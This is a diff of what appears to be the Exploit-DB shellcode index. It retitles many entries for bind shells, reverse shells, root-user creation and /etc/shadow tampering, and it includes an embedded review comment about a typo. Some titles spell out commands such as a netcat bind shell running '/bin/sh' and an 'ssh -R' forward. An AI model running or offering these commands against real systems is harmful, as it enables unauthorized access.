@@ -15867,16 +15868,16 @@ id,file,description,date,author,platform,type,port 13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid/execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0 13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric using IMUL Method Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0 -13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self Modifying Code Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0 -13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self Modifying Code Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0 13423,platforms/lin_x86/shellcode/13423.c,"Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0 13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0 13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Bind 5074/TCP (ToUpper Encoded) Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0 -13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User 't00r' encrypt Shellcode (116 
bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 -13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 +13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 +13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0 13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0 
@@ -15897,18 +15898,18 @@ id,file,description,date,author,platform,type,port 13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - Bind 5074/TCP Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - Bind 5074/TCP + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User 't00r' Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add User Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0 13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - break chroot execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0 -13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh encrypted Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh xor encrypted Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 +13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh 
(tolower() Evasion) Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 13459,platforms/lin_x86/shellcode/13459.c,"Linux/x86 - chroot()/execve() code Shellcode (80 bytes)",2001-01-13,preedator,lin_x86,shellcode,0 13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh (toupper() Evasion) Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0 -13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User 'z' Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 +13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0 
@@ -16058,8 +16059,8 @@ id,file,description,date,author,platform,type,port 13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0 13729,platforms/win_x86-64/shellcode/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,win_x86-64,shellcode,0 13730,platforms/lin_x86/shellcode/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode,0 -13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - hard / unclean reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 -13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - hard / unclean reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 +13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - Hard / Unclean Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 +13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - Hard / Unclean Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 
@@ -16080,13 +16081,13 @@ id,file,description,date,author,platform,type,port 14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); (XOR 88 encoded) Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind Shell 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0 -14218,platforms/linux/shellcode/14218.c,"Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14218,platforms/linux/shellcode/14218.c,"Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14221,platforms/windows/shellcode/14221.html,"Safari 4.0.5 - 5.0.0 (Windows XP / 7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode",2010-07-05,"Alexey Sintsov",windows,shellcode,0 14234,platforms/linux/shellcode/14234.c,"Linux - Bind 6778/TCP (XOR Encoded) Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 -14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14235,platforms/linux/shellcode/14235.c,"Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14261,platforms/arm/shellcode/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0 -14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 
bytes)",2010-07-08,gunslinger_,linux,shellcode,0 +14276,platforms/linux/shellcode/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0 14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0 14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - Bind Shell Netcat 8080/TCP Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0 
@@ -16130,8 +16131,8 @@ id,file,description,date,author,platform,type,port 18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 -18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + add user 'iph' Without Password to /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0 -18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 +18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0 +18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 
@@ -16141,9 +16142,9 @@ id,file,description,date,author,platform,type,port 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password Protected Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind Shell TCP Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 -23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 +23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 -25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0 +25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell 4444/TCP Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 
@@ -16158,7 +16159,7 @@ id,file,description,date,author,platform,type,port 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 -34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 +34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 
@@ -16172,7 +16173,7 @@ id,file,description,date,author,platform,type,port 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) (ROT13 Encoded) Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map google.com to 127.1.1.1 Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - execve(_/bin/sh_) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 
@@ -16206,11 +16207,11 @@ id,file,description,date,author,platform,type,port 37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0 -37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 +37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0 37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0 -37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 +37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell 12345/TCP Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 
@@ -16234,7 +16235,7 @@ id,file,description,date,author,platform,type,port 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 -39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 +39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 
@@ -16271,7 +16272,7 @@ id,file,description,date,author,platform,type,port 40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40026,platforms/lin_x86/shellcode/40026.txt,"Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",lin_x86,shellcode,0 40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind NetCat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 +40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0 
@@ -16284,7 +16285,7 @@ id,file,description,date,author,platform,type,port 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 -40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse zsh 9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 +40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 
@@ -16300,10 +16301,10 @@ id,file,description,date,author,platform,type,port 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0 -41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0 -41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0 +41183,platforms/linux/shellcode/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0 +41220,platforms/linux/shellcode/41220.c,"Linux - Reverse Shell Multi/Dual Mode Shellcode (Genearator) (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 -41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 +41375,platforms/linux/shellcode/41375.c,"Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0 
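Review bot: the new description on the `+41220` line misspells "Generator" as "Genearator"; since this hunk exists to tidy titles, fix it here: `Linux - Reverse Shell Multi/Dual Mode Shellcode (Generator) (129 bytes)`. The "(Generator)" qualifier is also not applied to the sibling odzhancode entries 41183 and 41375 in the same hunk, so confirm that only 41220 ships as a generator script rather than raw shellcode.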
@@ -16314,8 +16315,8 @@ id,file,description,date,author,platform,type,port 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 -41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse NetCat Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 -41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse NetCat Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 +41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 